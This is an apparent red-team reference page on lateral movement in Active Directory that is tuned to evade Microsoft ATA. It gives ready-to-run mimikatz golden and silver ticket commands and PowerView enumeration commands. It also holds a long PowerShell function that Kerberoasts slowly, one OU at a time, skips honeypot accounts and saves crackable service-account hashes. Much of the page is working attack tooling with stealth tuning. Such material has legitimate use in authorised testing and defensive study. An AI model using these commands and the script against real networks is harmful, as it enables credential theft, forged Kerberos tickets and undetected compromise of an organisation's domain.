The Red Team Vade Mecum
Lateral Movement


Last updated 3 years ago


Most lateral movement techniques (PsExec, PowerShell Remoting, DCOM, WMIExec) are flagged by ATA only as "abnormal traffic": the alert fires when an account or host does something it does not normally do. If the same activity is routine for that account, for example help desk staff RDPing to workstations to fix problems, using it is comparatively safe because it matches the established baseline.

There are, however, stealthier ways to move laterally than those technologies.

Over-Pass-The-Hash

Over-pass-the-hash with only the NTLM hash will be flagged by ATA as an encryption downgrade (an unusual protocol implementation).

To generate Kerberos tickets that are not flagged, supply the AES keys alongside the NTLM hash and give the ticket a normal lifetime. The /endin and /renewmax values are in minutes:

kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<SID> /aes128:<AES128_KEY> /NTLM:<NTLM_HASH> /aes256:<AES256_KEY> /endin:600 /renewmax:300 /ptt

Note that the aes128 key can be all zeroes without being flagged.

SQL

Moving laterally through SQL Server is not detected by ATA because no authentication traffic reaches the DC: SQL logins (as opposed to Windows authentication) are handled locally by the SQL server. Find passwords or hashes of a privileged SQL user, impersonate that user, and continue from there.

Silver Tickets

Kerberoasting combined with silver tickets is a good way to move laterally: Kerberoasting (requesting service tickets) blends in with normal traffic, and a silver ticket is a forged TGS that never touches the DC.

Kerberoast slowly. Requesting tickets for every SPN at once produces a traffic spike that may trigger alerts.

We can slowly enumerate user objects with an SPN, by OU:

Get-DomainUser -SPN -SearchBase "LDAP://OU=office,DC=..."

Then perform recon on groups that have access on various targets of interest:

Get-DomainGroup -MemberIdentity <user>

And then kerberoast that target if applicable:

Get-DomainUser <user> | Get-DomainSPNTicket | fl *

Beware of honeypot SPNs: factor in last logon, creation date, password age etc. to identify decoy accounts before requesting their tickets.
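The procedure above (one OU at a time, group recon per account, honeypot checks, a pause between ticket requests) in one function, as an added example that is not from the original page. It assumes PowerView is already loaded (Get-DomainOU, Get-DomainUser, Get-DomainGroup and Get-DomainSPNTicket are PowerView functions); the 90-day staleness threshold, the delay range and the output file name are assumptions.

```powershell
# Added example: paced Kerberoast, one OU at a time, skipping likely honeypot SPNs.
# Requires PowerView to be loaded. Thresholds, delays and the file name are assumptions.
function Invoke-PacedKerberoast {
    param(
        [Parameter(Mandatory)] [string] $Domain,
        [int] $StaleDays = 90,            # no logon within this window counts as suspicious
        [int] $MinDelaySeconds = 600,     # random pause between ticket requests
        [int] $MaxDelaySeconds = 1800,
        [string] $OutFile = 'roast.hashcat'
    )
    $stale = (Get-Date).AddDays(-$StaleDays)
    $props = 'samaccountname','serviceprincipalname','lastlogontimestamp','whencreated','pwdlastset','useraccountcontrol'

    foreach ($ou in (Get-DomainOU -Domain $Domain | Select-Object -ExpandProperty distinguishedname)) {
        # one OU per LDAP query, as the text describes, instead of one domain-wide SPN query
        $users = Get-DomainUser -SPN -SearchBase "LDAP://$ou" -SearchScope OneLevel -Domain $Domain -Properties $props
        foreach ($u in $users) {
            # honeypot heuristics from the text: no recent logon, freshly created, or disabled accounts
            $flags = @()
            if (-not $u.lastlogontimestamp -or $u.lastlogontimestamp -lt $stale) { $flags += 'no recent logon' }
            if ($u.whencreated -gt $stale)                                        { $flags += 'recently created' }
            if ("$($u.useraccountcontrol)" -match 'ACCOUNTDISABLE')               { $flags += 'disabled' }
            if ($flags) {
                Write-Warning ("skipping {0} ({1})" -f $u.samaccountname, ($flags -join ', '))
                continue
            }

            # recon on what the account can reach before spending a ticket request on it
            $groups = Get-DomainGroup -MemberIdentity $u.samaccountname -Domain $Domain |
                      Select-Object -ExpandProperty samaccountname
            Write-Host ("[*] {0} in {1}; groups: {2}" -f $u.samaccountname, $ou, ($groups -join ', '))

            # request a single TGS for the first SPN and store the crackable hash
            $spn = @($u.serviceprincipalname)[0]
            $ticket = Get-DomainSPNTicket -SPN $spn -OutputFormat Hashcat
            if ($ticket) { $ticket.Hash | Out-File -FilePath $OutFile -Append -Encoding ascii }

            # spread the requests out so there is no spike of TGS-REQs from one host
            Start-Sleep -Seconds (Get-Random -Minimum $MinDelaySeconds -Maximum $MaxDelaySeconds)
        }
    }
}

# Usage: Invoke-PacedKerberoast -Domain prod.local
```

Because each OU is queried with a OneLevel scope, nested OUs are covered when Get-DomainOU reaches them and no account is requested twice. Accounts that live in the default Users container rather than in an OU are not visited by this loop and need a separate, equally paced, query.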

If we crack the hash, we can create a silver ticket for that service on that host using the service account's NTLM hash (the RC4 key derived from the cracked password):

kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<SID> /rc4:<NTLM_HASH> /endin:600 /renewmax:300 /service:<SERVICE> /target:<TARGET_COMPUTER> /ptt

Modification of Sensitive groups

If any of ATA's sensitive groups is modified, for example by adding an account or changing a password, the change is flagged as abnormal activity.

As a result, target other privileged but unmonitored groups, such as SQL admins or help desk users, instead.

Golden Tickets

The same encryption downgrade logic applies to golden tickets: if only the NTLM hash is supplied, the ticket is flagged.

To avoid this, include the AES keys. Also note that a ticket that stays valid for more than 8 hours after it has been used is flagged, so for extra stealth create a ticket for around 20 minutes, use it, and purge it immediately afterwards. /startoffset, /endin and /renewmax are all in minutes:

kerberos::golden /user:JohnVanwagoner /domain:prod.local /sid:<SID> /aes256:<AES256_KEY> /groups:512,513,519 /startoffset:-1 /endin:20 /renewmax:20 /ptt
